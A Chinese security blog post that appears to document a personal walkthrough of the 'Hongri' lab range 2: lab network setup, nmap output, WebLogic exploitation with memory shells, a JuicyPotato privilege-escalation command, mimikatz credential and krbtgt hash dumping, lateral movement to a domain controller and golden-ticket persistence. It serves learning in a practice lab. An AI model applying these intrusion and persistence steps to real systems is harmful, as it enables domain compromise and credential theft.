<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="红日靶场 2, marin的小窝">
    <meta name="description" content="红日靶场 2靶场搭建需要先配置一个虚拟网卡 VMnet2​，网段是 10.10.10.0/24

然后配置靶机的网卡
PC：


DC：


WEB：


这里要修改 NAT 的网段地址，我的 kali 上是 154
在 windows 中">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>红日靶场 2 | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/76dty8y5jpmit0o32n6a4dpr3.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">红日靶场 2</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">内网渗透</span>
                            </a>
                        
                            <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                                <span class="chip bg-color">红日靶场系列</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                渗透
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-03-17
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="红日靶场-2"><a href="#红日靶场-2" class="headerlink" title="红日靶场 2"></a>红日靶场 2</h1><h2 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>靶场搭建</h2><p>需要先配置一个虚拟网卡 <code>VMnet2</code>​，网段是 <code>10.10.10.0/24</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312154105-scl9713.png" alt="image"></p>
<p>然后配置靶机的网卡</p>
<p>PC：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312154814-7ec0ns7.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312161217-x5tj7xd.png" alt="image"></p>
<p>DC：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312154927-l8nzj6k.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312161144-8kegfja.png" alt="image"></p>
<p>WEB：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312155056-b0fbsw3.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312161627-ca2rbkl.png" alt="image"></p>
<p>这里要修改 NAT 的网段地址，我的 kali 上是 154</p>
<p>在 windows 中搜索 网络和共享中心，选择更改适配器设置</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312162341-c6ds0ce.png" alt="image"></p>
<p>右键属性</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312162357-74s1c20.png" alt="image"></p>
<p>选择 Internet 协议版本 4</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312162411-qcz25vn.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312162517-84cllva.png" alt="image"></p>
<p>然后需要开启 WEB 服务，到 WEB 服务器，右键以管理员登录这三个文件</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312162828-ix2w1w2.png" alt="image"></p>
<p>‍</p>
<h2 id="渗透过程"><a href="#渗透过程" class="headerlink" title="渗透过程"></a>渗透过程</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312163852-o0c7ytg.png" alt="image"></p>
<h4 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h4><p>这里目录没有扫描到东西，这个 301 也是空的</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312163902-bb7o5hc.png" alt="image"></p>
<p>‍</p>
<h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><p>感觉端口扫描可能东西多一点</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312164436-6vceu4b.png" alt="image"></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">Starting Nmap 7.95 ( https:&#x2F;&#x2F;nmap.org ) at 2026-03-12 16:34 CST
Nmap scan report for 192.168.154.80
Host is up (0.00089s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
80&#x2F;tcp    open  http
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn&#39;t have a title.
135&#x2F;tcp   open  msrpc
139&#x2F;tcp   open  netbios-ssn
445&#x2F;tcp   open  microsoft-ds
1433&#x2F;tcp  open  ms-sql-s
| ms-sql-info:
|   192.168.154.80:1433:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-03-12T08:35:37+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
|   192.168.154.80:1433:
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ssl-cert: Subject: commonName&#x3D;SSL_Self_Signed_Fallback
| Not valid before: 2026-03-12T08:02:49
|_Not valid after:  2056-03-12T08:02:49
7001&#x2F;tcp  open  afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152&#x2F;tcp open  unknown
49153&#x2F;tcp open  unknown
49154&#x2F;tcp open  unknown

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:&#x2F;o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2026-03-12T16:34:27+08:00
| smb2-time:
|   date: 2026-03-12T08:34:27
|_  start_date: 2026-03-12T08:03:16
|_nbstat: NetBIOS name: WEB, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 00:0c:29:52:fa:49 (VMware)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: -1h36m00s, deviation: 3h34m39s, median: -1s
| smb-security-mode:
|   account_used: &lt;blank&gt;
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap done: 1 IP address (1 host up) scanned in 75.90 seconds</code></pre>

<p>‍</p>
<h3 id="渗透"><a href="#渗透" class="headerlink" title="渗透"></a>渗透</h3><p>‍</p>
<h4 id="永恒之蓝（失败）"><a href="#永恒之蓝（失败）" class="headerlink" title="永恒之蓝（失败）"></a>永恒之蓝（失败）</h4><p>这里开了 445 和 139 端口，看看有没有永恒之蓝</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312165233-1rrzn8u.png" alt="image"></p>
<p>这里检测是有的，但是好像是打不通的</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312165412-0x92j0d.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312165857-gkm1dfo.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312165909-pdk9l8p.png" alt="image"></p>
<blockquote>
<p>这里后面发现应该是 360 干的（</p>
</blockquote>
<p>‍</p>
<h4 id="MSSQL（失败）"><a href="#MSSQL（失败）" class="headerlink" title="MSSQL（失败）"></a>MSSQL（失败）</h4><p>然后看看这里还有一个 mssql 能不能打，没有用户名和密码，应该也是不行</p>
<h4 id="WebLogic"><a href="#WebLogic" class="headerlink" title="WebLogic"></a>WebLogic</h4><p>这里还有一个 7001 端口，是 WebLogic 的端口，版本是 <code>Oracle WebLogic Server 10.3.6.0</code>，有东西就可以扫描了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312170748-y1kceng.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312172349-8kegb2k.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312172718-kqjaz2p.png" alt="image"></p>
<p>这个版本应该是存在漏洞的，利用工具试一下，存在漏洞</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312183402-k6sb4qg.png" alt="image"></p>
<p>看看能不能注入内存马，这里发现用这个漏洞注入不进去内存马，换了一个漏洞</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312184341-g2dd167.png" alt="image"></p>
<p>这个漏洞注入的冰蝎内存马是可以连接的，但是蚁剑不行不知道为什么</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312184620-xw6y7w5.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312184627-ozrvxjl.png" alt="image"></p>
<p>后来突然想起来，只能命令执行的话可以直接上 vshell 了，成功上线了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312184741-krqe0q1.png" alt="image"></p>
<p>‍</p>
<h3 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h3><p>能上传文件了，可以上 CS 了，这个还是好用一点，不过文件上传上去好像不成功，应该是被 360 给防护了</p>
<p>查看当前所有进程，这里看到几个进程，应该是 360 的杀软</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">tasklist &#x2F;svc

C:\Windows\Temp&gt;tasklist &#x2F;svc

映像名称                       PID 服务
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
System Idle Process              0 暂缺
System                           4 暂缺
smss.exe                       256 暂缺
csrss.exe                      344 暂缺
wininit.exe                    396 暂缺
csrss.exe                      408 暂缺
winlogon.exe                   444 暂缺
services.exe                   500 暂缺
lsass.exe                      516 Netlogon, SamSs
lsm.exe                        524 暂缺
svchost.exe                    612 DcomLaunch, PlugPlay, Power
vmacthlp.exe                   672 VMware Physical Disk Helper Service
svchost.exe                    708 RpcEptMapper, RpcSs
svchost.exe                    788 Dhcp, eventlog, lmhosts
svchost.exe                    856 AeLookupSvc, BITS, CertPropSvc, gpsvc,
                                   IKEEXT, iphlpsvc, LanmanServer, ProfSvc,
                                   Schedule, SENS, SessionEnv,
                                   ShellHWDetection, Winmgmt, wuauserv
svchost.exe                    912 EventSystem, netprofm, nsi, sppuinotify,
                                   W32Time, WinHttpAutoProxySvc
svchost.exe                    956 Netman, TrkWks, UmRdpService, UxSms
ZhuDongFangYu.exe             1012 ZhuDongFangYu
svchost.exe                    356 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
svchost.exe                    732 BFE, DPS, MpsSvc
spoolsv.exe                   1232 Spooler
svchost.exe                   1264 AppHostSvc
sqlservr.exe                  1392 MSSQL$SQLEXPRESS
SMSvcHost.exe                 1412 NetPipeActivator, NetTcpActivator,
                                   NetTcpPortSharing
ReportingServicesService.     1560 ReportServer$SQLEXPRESS
sqlwriter.exe                 1880 SQLWriter
VGAuthService.exe             1904 VGAuthService
vmtoolsd.exe                  1948 VMTools
svchost.exe                   1972 W3SVC, WAS
fdlauncher.exe                2128 MSSQLFDLauncher$SQLEXPRESS
svchost.exe                   2168 TermService
WmiPrvSE.exe                  2204 暂缺
svchost.exe                   2252 PolicyAgent
fdhost.exe                    2400 暂缺
conhost.exe                   2408 暂缺
dllhost.exe                   2472 COMSysApp
msdtc.exe                     2560 MSDTC
sppsvc.exe                     844 sppsvc
taskhost.exe                  2896 暂缺
dwm.exe                       1240 暂缺
explorer.exe                  2364 暂缺
vmtoolsd.exe                   908 暂缺
360Tray.exe                   2868 暂缺
SoftMgrLite.exe               3624 暂缺
cmd.exe                       1848 暂缺
conhost.exe                   4008 暂缺
java.exe                      3776 暂缺
cmd.exe                       3924 暂缺
conhost.exe                    604 暂缺
ebda8925tcp.exe               4144 暂缺
winpty-agent.exe              4520 暂缺
conhost.exe                   4480 暂缺
cmd.exe                       4116 暂缺
1.exe                         2740 暂缺
1.exe                         4300 暂缺
1.exe                         5096 暂缺
1.exe                         3588 暂缺
360Safe.exe                   4024 暂缺
360leakfixer.exe               940 暂缺
tasklist.exe                  3876 暂缺</code></pre>

<p>后来研究了半天，不知道为什么上线不了 CS，上靶机看了一眼发现是这个程序不知道为什么运行不了，会自动停止，好像也不是 360 的问题</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312191355-twd8ig5.png" alt="image"></p>
<p>不知道为什么，先用 vshell 打了，好像依旧可以用土豆家族打</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">C:\Users\Administrator\Desktop&gt;whoami &#x2F;priv

特权信息
----------------------

特权名                          描述                       状态
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
SeIncreaseQuotaPrivilege        为进程调整内存配额         已禁用
SeSecurityPrivilege             管理审核和安全日志         已禁用
SeTakeOwnershipPrivilege        取得文件或其他对象的所有权 已禁用
SeLoadDriverPrivilege           加载和卸载设备驱动程序     已禁用
SeSystemProfilePrivilege        配置文件系统性能           已禁用
SeSystemtimePrivilege           更改系统时间               已禁用
SeProfileSingleProcessPrivilege 配置文件单个进程           已禁用
SeIncreaseBasePriorityPrivilege 提高计划优先级             已禁用
SeCreatePagefilePrivilege       创建一个页面文件           已禁用
SeBackupPrivilege               备份文件和目录             已禁用
SeRestorePrivilege              还原文件和目录             已禁用
SeShutdownPrivilege             关闭系统                   已禁用
SeDebugPrivilege                调试程序                   已启用
SeSystemEnvironmentPrivilege    修改固件环境值             已禁用
SeChangeNotifyPrivilege         绕过遍历检查               已启用
SeRemoteShutdownPrivilege       从远程系统强制关机         已禁用
SeUndockPrivilege               从扩展坞上取下计算机       已禁用
SeManageVolumePrivilege         执行卷维护任务             已禁用
SeImpersonatePrivilege          身份验证后模拟客户端       已启用
SeCreateGlobalPrivilege         创建全局对象               已启用
SeIncreaseWorkingSetPrivilege   增加进程工作集             已禁用
SeTimeZonePrivilege             更改时区                   已禁用
SeCreateSymbolicLinkPrivilege   创建符号链接               已禁用</code></pre>

<p>成功提权</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">C:\Windows\Temp\JuicyPotato.exe -t t -p &quot;C:\Windows\Temp\tcp_windows_amd64.exe&quot; -l 1337</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312193354-naeasiv.png" alt="image"></p>
<p>傻了，纠结半天，我可以直接 rdp 上去把 360 杀了</p>
<p><del>结果杀了依旧停止工作，我真没招了</del></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312203441-434zxl4.png" alt="image"></p>
<p>找到问题了，应该是这个 ip 限制的问题，原本是使用的 wsl 打开的 cs，后面修改成用我的 ubuntu 起 cs，ip 修改为 192.168.154.130 之后就可以了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314151253-sjeftlx.png" alt="image"></p>
<p>然后直接权限提升</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314151412-rs3pl36.png" alt="image"></p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h3 id="内网横向"><a href="#内网横向" class="headerlink" title="内网横向"></a>内网横向</h3><h4 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h4><p>这里另一个 IP 应该就是内网网段的 IP <code>10.10.10.0/24</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312193443-i3nj6q0.png" alt="image"></p>
<p>执行插件 mimikatz，成功获取到了用户密码 <code>admin@123</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312194030-9ztbgmq.png" alt="image"></p>
<p>这里获取域信息会报错</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314151629-krbcywy.png" alt="image"></p>
<p>获取域信息，这里确定在域中</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">net config workstation</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260312200645-tu8io5r.png" alt="image"></p>
<p>可以使用这个命令查看域内信息，这个是不会报错的，成功获取了域内信息</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">net computers</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314152002-mma1jk7.png" alt="image"></p>
<p>进行端口扫描，扫到有 445 端口</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314152629-qxl7ngy.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314152613-a1gkak5.png" alt="image"></p>
<p>另一台机子也是一样开启了 445</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314153308-i0rwx0h.png" alt="image"></p>
<p>‍</p>
<h4 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h4><p>这里确认了域控机器开启了 445 端口，那就尝试横向连接上去</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314152818-tdwcabh.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314153000-tu5za4s.png" alt="image"></p>
<p>成功上线</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314153020-2jfebui.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314153010-0z0ta1j.png" alt="image"></p>
<p>另一台</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314153432-p0ucvz6.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314153439-xp6yaee.png" alt="image"></p>
<h3 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h3><p>这里需要创建一个黄金票据，如果被下线了，只要又掌握了另一台外网服务器，就可以使用黄金票据恢复域管理员的身份</p>
<p>获取黄金票据需要 4 个信息</p>
<ol>
<li>域的 SID 安全标识符</li>
<li>域的名称</li>
<li><code>krbtgt</code> 账户的 NTLM Hash</li>
<li>需要伪造的用户</li>
</ol>
<p>获取到 SID</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">shell whoami &#x2F;all
S-1-5-18</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314154629-bedvosu.png" alt="image"></p>
<p>获取域名</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">shell ipconfig &#x2F;all
de1ay.com</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314154723-7uepidh.png" alt="image"></p>
<p>‍</p>
<p>获取到 <code>krbtgt</code>​ 的哈希，NTLM 是最后一部分的 hash，这个是格式是<br>​<code>用户名:RID:LM Hash:NTLM Hash:::</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">82dfc71b72a11ef37d663047bc2088fb</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314154330-gqu8e13.png" alt="image"></p>
<p>需要伪造的用户</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">net user</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314154901-l1lls3g.png" alt="image"></p>
<p>然后要切换目录到 C 盘中</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155036-g5np88d.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155051-5t3a5ze.png" alt="image"></p>
<p>输入信息</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155128-2sv0v7t.png" alt="image"></p>
<p>生成成功</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155202-y8x45tw.png" alt="image"></p>
<p>另一种确认方法</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">run klist</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155251-gsxyvar.png" alt="image"></p>
<p>然后需要创建黄金票据，刚才只是生成了，现在需要创建一个文件来保存</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">mimikatz kerberos::list &#x2F;export</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155413-4v9xy3v.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155427-bu52zl1.png" alt="image"></p>
<p>然后需要将这两个文件下载下来</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155628-6k6mqzd.png" alt="image"></p>
<p>这里下载的两个文件在虚拟机中</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260314155748-euvccyd.png" alt="image"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
